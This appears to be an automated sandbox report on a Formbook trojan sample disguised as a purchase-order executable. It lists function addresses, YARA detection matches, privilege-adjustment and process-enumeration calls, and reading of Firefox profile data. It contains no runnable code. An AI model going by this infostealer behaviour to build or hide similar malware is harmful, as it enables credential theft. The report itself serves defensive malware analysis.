            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F81CC2_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F41A22_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035001AA2_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D20002_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034647502_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034407702_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C02_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C6E02_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034405352_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035005912_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F24462_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E44202_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EE4F62_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB402_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F6BD72_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA802_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034569622_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A02_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350A9A62_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344A8402_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034428402_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E8F02_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034268B82_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4F402_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03482F282_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460F302_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E2F302_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432FC82_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344CFE02_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BEFA02_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440E592_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEE262_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FEEDB2_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452E902_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FCE932_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344AD002_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DCD1F2_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343ADE02_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03458DBF2_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440C002_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430CF22_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0CB52_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342D34C2_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F132D2_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0348739A2_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B2C02_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E12ED2_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034452A02_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347516C2_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342F1722_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350B16B2_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344B1B02_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EF0CC2_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034470C02_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F70E92_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF0E02_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF7B02_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034856302_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F16CC2_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F75712_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035095C32_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DD5B02_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034314602_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FF43F2_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFB762_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B5BF02_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347DBF92_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FB802_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFA492_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7A462_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B3A6C2_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EDAC62_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DDAAC2_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03485AA02_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E1AA32_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034499502_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345B9502_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D59102_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AD8002_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034438E02_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFF092_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD22_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03403FD52_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03441F922_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFFB12_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03449EB02_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03443D402_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F1D5A2_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F7D732_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345FDC02_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B9C322_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FFCF22_2_034FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B720004_2_00B72000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00BA01AA4_2_00BA01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B941A24_2_00B941A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B981CC4_2_00B981CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AD01004_2_00AD0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B7A1184_2_00B7A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B681584_2_00B68158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B602C04_2_00B602C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B802744_2_00B80274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00BA03E64_2_00BA03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AEE3F04_2_00AEE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9A3524_2_00B9A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B8E4F64_2_00B8E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B844204_2_00B84420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B924464_2_00B92446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00BA05914_2_00BA0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE05354_2_00AE0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AFC6E04_2_00AFC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00ADC7C04_2_00ADC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE07704_2_00AE0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B047504_2_00B04750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AC68B84_2_00AC68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B0E8F04_2_00B0E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE28404_2_00AE2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AEA8404_2_00AEA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE29A04_2_00AE29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00BAA9A64_2_00BAA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AF69624_2_00AF6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00ADEA804_2_00ADEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B96BD74_2_00B96BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9AB404_2_00B9AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B80CB54_2_00B80CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AD0CF24_2_00AD0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE0C004_2_00AE0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AF8DBF4_2_00AF8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00ADADE04_2_00ADADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B7CD1F4_2_00B7CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AEAD004_2_00AEAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9CE934_2_00B9CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AF2E904_2_00AF2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9EEDB4_2_00B9EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9EE264_2_00B9EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE0E594_2_00AE0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B5EFA04_2_00B5EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AECFE04_2_00AECFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AD2FC84_2_00AD2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B00F304_2_00B00F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B82F304_2_00B82F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B22F284_2_00B22F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B54F404_2_00B54F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B970E94_2_00B970E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9F0E04_2_00B9F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE70C04_2_00AE70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B8F0CC4_2_00B8F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AEB1B04_2_00AEB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00BAB16B4_2_00BAB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B1516C4_2_00B1516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00ACF1724_2_00ACF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE52A04_2_00AE52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B812ED4_2_00B812ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AFB2C04_2_00AFB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B2739A4_2_00B2739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9132D4_2_00B9132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00ACD34C4_2_00ACD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9F43F4_2_00B9F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AD14604_2_00AD1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B7D5B04_2_00B7D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00BA95C34_2_00BA95C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B975714_2_00B97571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B916CC4_2_00B916CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B256304_2_00B25630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9F7B04_2_00B9F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE38E04_2_00AE38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B4D8004_2_00B4D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B759104_2_00B75910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE99504_2_00AE9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AFB9504_2_00AFB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B25AA04_2_00B25AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B7DAAC4_2_00B7DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B81AA34_2_00B81AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B8DAC64_2_00B8DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B53A6C4_2_00B53A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9FA494_2_00B9FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B97A464_2_00B97A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AFFB804_2_00AFFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B55BF04_2_00B55BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B1DBF94_2_00B1DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9FB764_2_00B9FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9FCF24_2_00B9FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B59C324_2_00B59C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AFFDC04_2_00AFFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B97D734_2_00B97D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B91D5A4_2_00B91D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE3D404_2_00AE3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE9EB04_2_00AE9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9FFB14_2_00B9FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AE1F924_2_00AE1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AA3FD24_2_00AA3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00AA3FD54_2_00AA3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_00B9FF094_2_00B9FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D15E04_2_001D15E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001CC7D04_2_001CC7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001CC7C74_2_001CC7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001CC9F04_2_001CC9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001CAA704_2_001CAA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D30F04_2_001D30F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001D30EE4_2_001D30EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_001E9FD04_2_001E9FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0099A0AF4_2_0099A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0099B8B44_2_0099B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0099B9D64_2_0099B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0099ADD84_2_0099ADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0099BD6C4_2_0099BD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 105 times
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: String function: 00149CB3 appears 31 times
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: String function: 00160A30 appears 46 times
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: String function: 0015F9F2 appears 40 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 00B15130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 00ACB970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 00B5F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 00B27E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 00B4EA12 appears 86 times
            Source: PO-DOC1522025-12.exe, 00000000.00000003.2145035552.0000000003B4D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-DOC1522025-12.exe
            Source: PO-DOC1522025-12.exe, 00000000.00000003.2145986490.00000000039A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-DOC1522025-12.exe
            Source: PO-DOC1522025-12.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/7
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B37B5 GetLastError,FormatMessageW,0_2_001B37B5
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A10BF AdjustTokenPrivileges,CloseHandle,0_2_001A10BF
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001A16C3
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001B51CD
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_001CA67C
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_001B648E
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_001442A2
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeFile created: C:\Users\user\AppData\Local\Temp\turbinateJump to behavior
            Source: PO-DOC1522025-12.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
